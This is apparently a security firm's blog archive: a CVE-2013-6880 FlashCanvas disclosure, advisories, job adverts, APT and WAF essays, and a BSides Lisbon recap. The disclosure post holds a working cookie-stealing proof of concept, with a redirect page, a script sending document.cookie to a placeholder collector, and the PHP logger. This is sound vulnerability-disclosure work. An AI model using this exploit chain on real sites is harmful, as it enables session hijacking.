CVE-2013-6880 Proof of Concept

Marc Wickenden recently discovered a security issue within FlashCanvas 1.5 that could lead to a number of issues, such as cross-site scripting. The issue has been assigned CVE-2013-6880 and the vendor has now released a fix for the issue, which can be found here. In this blog post we take a closer look at the issue and the proof of concept that shows how it can be used to steal session tokens.

 

Vulnerable code

The issue exists because the proxy.php script does not adequately verify the Referer header before requesting (via curl) the remote URL specified in the ‘url’ GET parameter and returning the fetched content to the browser. The Referer is supplied by the client, and the check only looks at the end of its path, not at the host it names, so any attacker-hosted page whose URL ends in /flashcanvas.swf satisfies it.

Within the proxy.php file the offending check is:

if (!preg_match('#/flash\d*canvas\.swf$#', $_SERVER['HTTP_REFERER'])) {

 

Creating the exploit

In order to exploit this issue the victim needs to already be logged in to the target site, and the attacker needs control of a website that can serve a page whose URL ends in /flashcanvas.swf, since that suffix is all the regex above checks.

Our malicious /flashcanvas.swf page makes the victim's browser request the vulnerable proxy.php on the remote site. An attacker entices a victim user to click on a link to that page. The page then navigates, for example via a redirect, to proxy.php at the target site with the ‘url’ parameter pointing at attacker-controlled content; the browser sets the Referer to the page it came from, which ends in /flashcanvas.swf and so passes the check (this relies on the victim's browser sending a Referer for that navigation, which not every browser does for every redirect mechanism). proxy.php fetches the requested URL server-side with curl and returns the body as a response from the target site, so the attacker's HTML is rendered in the target's origin. Page rewrite, script execution with the target's cookies, you name it, it becomes possible from this point.
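To make the gap in that check concrete, here is an added example (not code from FlashCanvas or from the original post) that runs the same preg_match over a few constructed Referer values, beside a hardened variant. The hardened variant is an assumption for illustration, not the fix shipped in FlashCanvas 1.6: it parses the Referer, insists on an absolute http(s) URL whose host is our own, and only then applies the original path check. The host names are the placeholders used in this post.

```php
<?php
// Added example for this post; not code from FlashCanvas 1.5 or from 7 Elements.
// Shows why the proxy.php Referer check is bypassable, and one hardened variant
// (the hardened variant is an assumption, not the vendor's 1.6 fix).

// The check as it appears in FlashCanvas 1.5 proxy.php. It only inspects the
// tail of the Referer, so any host serving a path that ends in flashcanvas.swf
// (with an optional digit run after "flash") satisfies it.
function referer_passes_vulnerable_check($referer)
{
    if ($referer === null) {
        return false;
    }
    return preg_match('#/flash\d*canvas\.swf$#', $referer) === 1;
}

// Hardened variant (assumption): require an absolute http(s) Referer whose
// host is our own, then apply the original path check to the path component.
function referer_passes_hardened_check($referer, $ownHost)
{
    if ($referer === null) {
        return false;
    }
    $parts = parse_url($referer);
    if ($parts === false || !isset($parts['scheme'], $parts['host'], $parts['path'])) {
        return false;
    }
    if (!in_array(strtolower($parts['scheme']), array('http', 'https'), true)) {
        return false;
    }
    // Exact host match: defeats delivery.com, target.com.delivery.com and
    // userinfo tricks such as http://www.target.com@delivery.com/...
    if (strcasecmp($parts['host'], $ownHost) !== 0) {
        return false;
    }
    return preg_match('#/flash\d*canvas\.swf$#', $parts['path']) === 1;
}

// Constructed sample Referer values, using the placeholder hosts from the post.
$ownHost = 'www.target.com';
$cases = array(
    'genuine FlashCanvas page' => 'http://www.target.com/FlashCanvas/flashcanvas.swf',
    'attacker-hosted page'     => 'http://delivery.com/flashcanvas.swf',
    'attacker, digit variant'  => 'http://delivery.com/flash9canvas.swf',
    'userinfo trick'           => 'http://www.target.com@delivery.com/flashcanvas.swf',
    'no Referer header'        => null,
);

foreach ($cases as $label => $referer) {
    printf("%-26s 1.5 check: %-4s hardened: %s\n",
        $label,
        referer_passes_vulnerable_check($referer) ? 'pass' : 'fail',
        referer_passes_hardened_check($referer, $ownHost) ? 'pass' : 'fail');
}
```

Saved to a file and run with the php command-line binary, the three attacker-controlled Referer values pass the 1.5 check and fail the hardened one; only the genuine page passes both. Even the hardened check rests on a client-supplied header: anyone driving curl directly can set whatever Referer they like, so it only narrows the browser-driven attack described above. A proxy that fetches arbitrary URLs and hands the body back as text/html still needs the ‘url’ parameter constrained (for example to an allowlist of hosts or to image content types) and a non-HTML content type on the response.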

 

POC

We have generated a POC to prove this and can use the flaw to steal the session cookies of a victim under the following scenario. The attacker needs control of a website (let's call this delivery.com) that can serve a page ending in /flashcanvas.swf.

We then use the following code to make a call to the vulnerable proxy.php on the remote site (let's call this target.com) and have it fetch a page from our evil site (evil.com). We used a completely separate host for evil.com in order to ensure this was cross-domain.

On delivery.com we need the following:

-- flashcanvas.swf
<!DOCTYPE html>
<html>
<head>
<title>CVE 2013 6880 POC</title>
<!-- after one second the browser navigates to the vulnerable proxy; a browser that
     sends a Referer for this navigation sets it to this page's URL, ending in /flashcanvas.swf -->
<meta http-equiv="refresh" content="1;url=http://www.target.com/FlashCanvas/proxy.php?url=http://evil.com/xss.html">
</head>
<body>
<p>Redirecting...</p>
</body>
</html>
--

On the evil.com site our xss.html is the one-liner below, which ships the victim's cookies for the target.com origin to our collector (the cookie string is URL-encoded so that ‘&’ or ‘#’ in a cookie value cannot truncate the query). Note that cookies flagged HttpOnly are not exposed to document.cookie; the script still runs in the target's origin, though, so it could issue authenticated requests instead of reading the cookie.
<script>location.href = 'http://delivery.com/capture.php?cookie=' + encodeURIComponent(document.cookie);</script>

The capture.php file on delivery.com is used to record and print out the information sent to the page. It is also included in the access logs of course. For completeness the capture.php is:

<?php
// Attacker-side collector: appends every request to a daily file under /tmp
// and echoes the captured cookie pairs back for convenience.
$date = date("dmY");
$timestamp = date("D M j G:i:s T Y");
$collectionfile = "/tmp/collection.$date";
$fh = fopen($collectionfile, "a");
if ($fh === false) {
    die("cannot open $collectionfile");
}
$ip = $_SERVER['REMOTE_ADDR'];
fwrite($fh, "== $timestamp / $ip ==\n");
?>
<html>
<body>
<?php
// $_GET is always set, so test for content rather than existence
if (!empty($_GET)) {
    fwrite($fh, "== GET ==\n");
    foreach ($_GET as $k => $v) {
        // document.cookie arrives as "name=value; name2=value2"
        foreach (explode(";", $v) as $vv) {
            $vals = explode("=", trim($vv), 2);
            $name = htmlspecialchars($vals[0]);
            $value = htmlspecialchars(isset($vals[1]) ? $vals[1] : '');
            print "<p>$name: $value</p>";
        }
        fwrite($fh, "$k:$v\n");
    }
}
if (!empty($_POST)) {
    fwrite($fh, "== POST ==\n");
    foreach ($_POST as $k => $v) {
        fwrite($fh, "$k:$v\n");
        print "<p>" . htmlspecialchars("$k: $v") . "</p>";
    }
}
fclose($fh);
?>
</body>
</html>

 

Summary

In summary, an attacker entices a victim user to click on the malicious link (http://delivery.com/flashcanvas.swf). That page makes a request to the vulnerable proxy.php at the target site (in our case via a redirect) with the Referer set to a passable value. proxy.php fetches the requested URL (http://evil.com/xss.html) and renders it in the context of the target.com site, including script execution and access to the DOM.

 

Note

By default, under Apache the .swf extension is served as Shockwave Flash. We need it served as an HTML page, so the following configuration changes are required on the delivery.com webserver (the host that serves flashcanvas.swf):

Comment out the following line on /etc/mime.types:

#application/x-shockwave-flash swf swfl

In your apache configuration, change the following file /etc/apache2/mods-enabled/mime.conf and add:

AddType text/html .swf

Don’t forget to reload apache.

CVE-2013-6880 FlashCanvas proxy.php XSS Vulnerability

Advisory Information

Title: FlashCanvas proxy.php XSS Vulnerability

Date published: 11 December 2013

Reference: CVE-2013-6880

Advisory Summary

Script does not adequately verify the Referer header before requesting (via curl) the remote URL specified in the ‘url’ GET parameter and rendering it.

Vendor

FlashCanvas.net <http://flashcanvas.net/>

Affected Software

FlashCanvas 1.5 and possibly older.

FlashCanvas is also used in other software frameworks such as WebShims, therefore the affected software may be wider.

Description of Issue

The issue exists because the proxy.php script does not adequately verify the Referer header before requesting (via curl) the remote URL specified in the ‘url’ GET parameter and rendering it. This leads to some interesting possibilities, the one proved being cross-site scripting. More technical detail can be found in the following blog post.

Fix

We would recommend updating to version 1.6

Graduate Junior Security Tester Training and Development

As part of our on-going development, 7 Elements is looking to take on another Junior Security Tester in the summer of 2014. Through our dedicated Graduate Junior Security Tester Training and Development Plan they will gain the skills and experience necessary to become an independent, effective and highly skilled manual security tester. More information on this vacancy can be found on our careers page.

CVE-2013-6880 XSS in FlashCanvas Proxy.php

Advisory Information

Title: FlashCanvas proxy.php XSS Vulnerability
Date published: November 2013
Ref: CVE-2013-6880

Advisory Summary

Script does not adequately verify the Referer header before requesting (via curl) the remote URL specified in the ‘url’ GET parameter and rendering it.

Vendor

FlashCanvas.net <http://flashcanvas.net/>

Affected Software

FlashCanvas 1.5 and possibly older.

FlashCanvas is also used in other software frameworks such as WebShims, therefore the affected software may be wider.

Description of Issue

The issue exists because the proxy.php script does not adequately verify the Referer header before requesting (via curl) the remote URL specified in the ‘url’ GET parameter and rendering it. This leads to some interesting possibilities, the one proved being cross-site scripting.

PoC

For a proof of concept and further discussion, please see our blog on this issue.

Security Testing Scheduler required

e-Placement Scotland are working with us to help find a Security Testing Scheduler.

Security Testing Scheduler:

The role will be based from 7 Elements’ office.
The placement will be for 6 months, starting in January 2014.
Salary £15,000 per annum pro rata.

Apply online here

Senior Security Tester

We are looking for a Senior Security Tester to join the team. We pride ourselves on our expertise in technical information assurance, as such the candidate must have a high level of technical ability and share our passion for information security.

If this sounds like you then visit our careers page to find out more.

Advanced Persistent Threat – Redux

Given that the media keep discussing ‘Advanced Persistent Threat’, and given the need to keep a balanced view, I thought that I would revisit this topic. We first blogged and presented on this issue back in 2011 and those discussion points appear to still be valid now.

To be fair, I still have a love-hate relationship with the term Advanced Persistent Threat (APT). It is used to describe state-sponsored espionage, which I know exists and can be a significant threat to specific entities such as government departments and defence contractors. I'm also aware of APT-style attacks on corporate organisations. However, the term can be bandied around and badly applied to security ‘hacks’, as well as being seen as a ‘China-only’ issue. This is especially true when dealing with the media and specific security vendors. This is the side of APT that I hate.

 

So what is APT anyway?

APT is used to describe a variety of attacks but has its origins in what would be categorised as state sponsored cyber espionage. This traditional cyber espionage was concentrated on government agencies and supporting defence contractors. This has been extended to encompass a wider focus, resulting in what is known today as APT.

The objectives of APT can be seen as:

  • Gain access to information,
  • Maintain access to gather large quantities of data,
  • To serve a specific set of goals / objectives.

APT stands for Advanced Persistent Threat. So what do these terms really mean? A number of definitions exist, but from my perspective I see APT as:

Advanced – This relates to the ability of the attacker. It doesn't, however, mean that they will only use custom-created code to launch what are known as ‘zero-day’ attacks on a network. It is important to understand that they will take the path of least resistance when looking to compromise a network. If this can be done through trivially guessable passwords then that is the method they will use, but they have the capability to research and develop new attack code if required.

Persistent – This is a key differentiator from other threat actors. The aim of those conducting APT is to gain access to information, and the information targeted is of greatest value when gathered in volume. APT attacks therefore seek to maintain access to the network for as long as is required to achieve this. Smash-and-grab attacks, such as those that target credit card information, fall within a different class of threat actor and should not be confused with APT. However, an APT-style attack could be completed in such a fashion if the actor is able to meet their objectives with one short attack.

Threat – The use of the term threat within the context of APT relates to the fact that this is a targeted attack, which is directed to achieve a defined purpose and has both the intent and capability to gain access to the desired information.

 

So how does APT differ from cybercrime?

For me there is a degree of cross-over between cybercrime and APT. Highly capable threat actors within both areas are highly organised, well-motivated and funded. This makes both these actors a real threat. The key difference between an attack being classified as APT or cybercrime is the intention or driver behind the attack. At a high level, cybercrime focuses on making money by stealing data to commit fraud, whereas APT looks to gain a commercial advantage through the information it gains access to.

 

The Hype

APT has become over-hyped, and the hype has been used to sell products and services based on the APT threat. As an example, major security vendors now sell anti-APT services and products, with strap lines such as:

“Do You Know if Your Network Has Been Breached by Botnets, Advanced Malware or Persistent Threats?”

“threats such as the Advanced Persistent Threat (APT). These are one of the most dangerous types of threats”

“Introduces New Security Solutions to Counter Advanced Persistent Threats”

“Enterprise Computer Protection from Advanced Malware Threats/APT”

“New Security Solutions to Counter Advanced Persistent Threats”

Tom Reilly (CEO of ArcSight) explained that revenue for the second quarter was expected to be in the range of $55 million to $57 million (21%-25% growth over the same quarter the previous year), based partly on “growing cybercriminal activity and heightened awareness of the Advanced Persistent Threat”. So as you can see, APT is big business.

 

Even the media carry provocative statements around this topic that help fuel the hype:

“The APT attackers, however, employ undetectable zero-day exploits and social engineering techniques against company employees to breach networks.”

All of this feeds on the fear, uncertainty and doubt that exists around the term APT and implies the big bad guys are going to get you, regardless of who you are! Media focus is clearly on China and how it is behind all APT attacks. However, this paints a very narrow picture of reality and is predicated on the belief that all APT is state sponsored and, worse, that China is the only player. By focusing on just one potential avenue, we may fail to address the issue.

 

The Reality

In reality the threat is wider than that posed by ‘China’, in fact evidence leaked as part of the WikiLeaks stories showed that the US believed that “French espionage is so widespread that the damages [it causes] the German economy are larger as a whole than those caused by China or Russia.” (http://www.ibtimes.com/articles/97534/20110104/france-wikileaks-spying-germany.htm)

If we look more closely at APT, we can see that it falls into two categories. Firstly, with its roots firmly as a method of cyber-espionage, it was focused on gaining government information, clearly an activity undertaken by nation states. Secondly, as a style of attack broadly aligned to gaining access to intellectual property (IP) and commercially sensitive data. This second category indicates that APT-style attacks may not be the preserve of state-sponsored entities alone.

The aim of targeting commercial IP is to gain access to knowledge that can provide a competitive edge, such as blueprints, merger information and strategy documents. This type of information would give competitors an advantage over their rivals, and this is the real driving force behind the wider use of attacks classed as APT. These motivating factors could be attributed to individual organisations as well as governments pursuing economic growth. This also extends the threat surface to include those you partner or share information with.

 

Are you at risk?

If we listen to the hype then we are all at risk, even the mighty Google and the IMF have fallen foul of APT! Then again we are not all in the same market as Google (with all its sensitive customer data) or the IMF. So the first question to ask yourself is; do you hold information that someone is willing to spend time and effort in trying to obtain? If the answer is no, then you can sleep soundly in bed at night. Well, from an APT perspective at least. If your own data or that of a client that you hold has value then you will need to consider the threat posed by APT.

I believe that we are most at risk when we are looking in the wrong direction. Before we became aware of APT, organisations assessed that commercial data with no value from a cybercrime or fraud perspective wouldn't be a target in a hack, and as a result breaches went unnoticed. This continues to be the case. Why, therefore, do the attacks go unnoticed, and how do they breach the network in the first place? In my opinion a lot of this is down to the wrong focus within the organisation on what they are trying to protect (if anything!).

What do I mean by this? Well, within the UK we have a number of regulatory drivers that help organisations focus their priorities. The Information Commissioner and Data Protection requirements keep an organisation focused on protecting sensitive personal data. Financial regulation and PCI-DSS keep others focused on protecting financial data; however, there is no requirement, other than an individual organisation's risk appetite, in terms of protecting intellectual property. This is exactly what those conducting APT are targeting. They are going for something you didn't think to protect. You made a risk-based decision to focus on regulatory drivers; they made the decision to target your corporate network, steal as much data as they could and then see what was useful.

 

Solutions

So what is the solution? How do we defend against APT? In reality, in the same way you defend against other cyber threats: through a resilient approach to information security. What that looks like will depend on how the business approaches risk management, the level of assurance required and the organisation's risk appetite.

Any approach taken should be driven by a clear business need and understanding of the risk environment and the organisation’s risk management structure. The business needs to be aware of the threat environment that they are in and be able to make informed decisions, and not just be blinkered into making regulatory based decisions only.

We also need to accept that we are not able to achieve 100% security, especially through appliance based solutions or by just doing penetration testing or by being regulatory compliant. Instead we should approach this problem from the point of view of business resiliency, which captures the ability for an organisation to be robust to attack and to be able to detect / react / recover from an incident. Therefore as an organisation you will need to take steps to look for evidence of compromise and act accordingly if it is found.

What the WAF?

I’ve been noticing a trend of security vendors promising security-in-a-box solutions, and Web Application Firewalls (WAFs) are being promoted as one such solution. Unfortunately, organisations are dancing to this seductive, albeit dangerous, tune.

As a result, organisations choose to filter out traffic that would exploit their known vulnerabilities on their WAFs instead of applying vendor approved updates and fixes, refactoring or rewriting vulnerable code.

Don’t give your WAF the whole responsibility!

A WAF is a piece of software capable of applying a set of rules to an HTTP conversation. These rules will then allow the organisation to make control-flow decisions on the HTTP interaction and therefore help mitigate and protect against certain common attacks on the Web (XSS, SQLi, etc).

In short, it adds an additional layer of security to a web application, which is a good thing. This is done by keeping a separate rule-set for the detection and prevention of attacks, keeping the actual application oblivious to such attempts.

“Just because you feel safe, doesn’t mean that you’re secure”

WAFs exist in many different guises, as network appliances, full-blown applications or even modules running inside of web servers. When correctly deployed, WAFs are a huge help in preventing some common attacks on organisations’ applications. Cross-site scripting, SQL-injection, brute-force attacks are on the top of the list of attacks that you would be able to prevent with the help of a correctly configured WAF.

Of course this doesn’t mean that by having a WAF you don’t have to include security-aware developers and secure coding practices, or stop applying security updates, just because you are “protected” against some of these threats. Security controls should be placed as near as possible to the asset you are trying to protect and a defence-in-depth approach is required. A WAF should therefore be one of many security measures deployed, not relied on in isolation.

“In the absence of other factors, always use the most secure options available.” – Dr. Joel Snyder

Whilst filtering the input and output of your application might protect you against some of the OWASP Top Ten attacks, WAFs are only able to protect against a limited set of specific and well-known attack patterns.

Keeping in tune with the “locking doors behind locked doors” mantra that guides the defence-in-depth approach, you should always keep increasing the overall security of your environment to keep pace with current threats. This is done by applying security patches, fixing security bugs in software, hardening configurations and establishing and maintaining security baselines.

Security is not a recipe. Security is an on-going process that evolves over time. This process includes applying updates, whether to devices (security patches), people (raising security awareness) or processes (security reviews).

Relying on a WAF to protect you from a currently known weakness, so that you can avoid patching, will only lead to more headaches further down the line.

This subject is something that we will explore further in later posts.

 

Security Testing Project Manager

We are looking for a Security Testing Project Manager to join the team.

The role of the Security Testing Project Manager will be to work within 7 Elements’ busy technical team to manage the delivery of security testing whilst ensuring 7 Elements’ high standards of customer service are met.  The main focus of the role is to ensure the smooth and effective delivery of security tests through technical project management. This role is key to the effective functioning of the overall test team. The project manager will be responsible for ensuring process is followed and that standards are met. This will require effective communication with clients and the testing team.

This role is ideal for an individual with a solid technical understanding of information technology and associated terminology and a basic understanding of information security looking for their first role within the information security industry.  The role will allow an individual to gain an understanding of the broad spectrum of security testing in a business environment and the challenges this brings. As a customer facing role it will also enable the individual to gain that vital experience of working with businesses and understanding their requirements.

For further information visit our careers page.

My trip to BSides Lisbon 2013

On the 4th of October I headed to BSides Lisbon 2013 to talk about Cell Injection.

It was the first meeting of this kind in Portugal (for infosec people by infosec people, open to the general public, free admission, international speakers and attendees). There were about 180 people there in both rooms.


Other than my talk, here’s a rundown of what I saw.

Convincing your friend that a Website sucks by Colin McLean

Colin tried to prove to his friend Mark a website he used wasn’t that safe… and failed. The end result – and a big win – is this talk. We should realise that after all this time, since the beginning of the World Wide Web, we still haven’t been able to prove automatically and successfully if a site is doing something malicious. Colin’s initial solution is a smart mix of proxying, analysis and IDS techniques. It looks very promising. I just hope Colin is able to find a grad student that tackles this issue and fixes it for us!

Security (A)SAP by Bruno Morisson

This talk was about SAP, the hugely complex enterprise system that is prevalent in most large companies in the world, and the challenges in keeping these kinds of critical systems secure and healthy. Some of the work presented resulted in a Metasploit module for SAP pen-testing. A typical talk at these gatherings.

Digital Forensics in today’s digital world by David Marques

In this talk, David gave us a general, introductory overview of Digital Forensics: starting with the history of digital forensics, describing the different mindsets of the technical forensicators and the legal crowd (judges and lawyers), covering existing software and its usage, and explaining the current (and future) challenges faced by a forensics company. Unfortunately, in the end, Q&A fell back to the oldest discussion in the book: “Open Source” vs “Proprietary” software. A very good intro to the Digital Forensics world, nonetheless.

All your sites are belong to Burp by Tiago Mendo

A plain talk that had a bit for everyone, an introduction to Burp for the newbies and developers and tips that experienced users always enjoy (Macros and Extensions). I also learned about using both Intruder and the Scanner to optimize testing. I actually overheard someone in the room say “where do I sign to get this fantastic piece of software?”. Oh, and I do believe Dafydd Stuttard deserves every penny he is paid for Burp!

“there is no spoon” – The art of “bending” a vulnerability with the power of mind by Pedro Cabrita

Revisiting the idea that automated vulnerability scanning is worth exactly what it is worth, Pedro described several vulnerabilities in a custom-tailored app that some of the automated vulnerability scanners couldn't find. Some of these vulnerabilities were so basic and obvious that even an inexperienced tester would find them. While the topic isn't new, it made a good point, since it explains the skewed perception of reality that organisations have after being subjected to testing. Testing for security isn't a case of point & shoot, or point & click in our case. Just as attackers are somewhat artistic in their trade, so too should testers be. Automated testing tools are just that: tools. Give a skilled tester some good tools and he will deliver.

Revisiting Mac OS X Rootkits by Pedro Vilaça

Unfortunately, I only saw the end of this talk since I was at Pedro Cabrita's talk, but from what I gathered, Pedro is one of the world's authorities on OS X rootkits and his work is mind-blowing and an eye-opener regarding OS X's security. One of my favourite talks.

Securing Password Storage – Increasing Resistance to Brute Force Attacks by Tiago Teles

As recent years have shown, storing passwords securely has proven quite difficult, judging by all the password leaks and disclosures, even for big players like Yahoo!, Twitter and LinkedIn. After an introduction covering the design decisions and evolution of hashing functions for password storage, Tiago from Cigital proposed an HMAC-based solution for storing user passwords. It was quite an interesting and technical talk, with some food for thought on the future of secure password storage and management for organisations.

Man vs Internet or The future of Authentication by Luís Grangeia

Why is it so hard for people (even us, infosec professionals) to properly and securely manage our digital online selves? In his talk, Luis talked about the Mat Honan digital life theft case, authentication and the management of digital identities. It was a basic subject, but still something we haven't completely figured out and often leave to superficial thinking and management, without realising we are putting ourselves at unnecessary risk with a high likelihood of exploitation. Luis finished the talk with some ideas on how to increase our security and raised awareness of these topics. A very interesting talk with a lot of food for thought.

I’m the guy your CSO is STILL warning you about by Gavin Ewan

Gavin is a funny and gifted speaker. He has the heart of a Social Engineer: he lures you in and you're hopelessly captivated. His talk debunked common Social Engineering misconceptions and covered juicy targets and successful results. It's funny how legally required compliance disclosures and leaked results so often help out the attacker, especially because attackers usually end up not being uber-nerdy, obsessive, technically proficient people… just really motivated beings. Information acquisition is, more often than not, one Google search away! You just need to be smart about how to use it.

Aftermath

Other than the talks, there was a crypto-challenge (decrypting a file containing an encrypted version of SGFja2VyJ3MgTWFuaWZlc3Rv, spoiler avoided by b64-encoding) and two attendees signed up for lightning talks. For this, the participants won the chance to have dinner with the speakers.

Dinner ensued at a Brazilian meat restaurant, “Orizon”, where almost all the speakers met (I missed all the other Scots who travelled to Portugal for the event!), followed by drinks at Expo's Peter's to wrap up.
All in all, a good InfoSec informal meeting. I was pleased to see that some of the talks developed on ideas from previous shorter talks from “Confraria da Segurança Informática”, a monthly InfoSec meeting very much in the spirit of BSides only smaller. They have an active community there.

Congratulations to Tiago Henriques and Bruno Morisson for making this event happen. Next year, we might have a BeachCon…
Looking forward to BSides Lisbon 2014!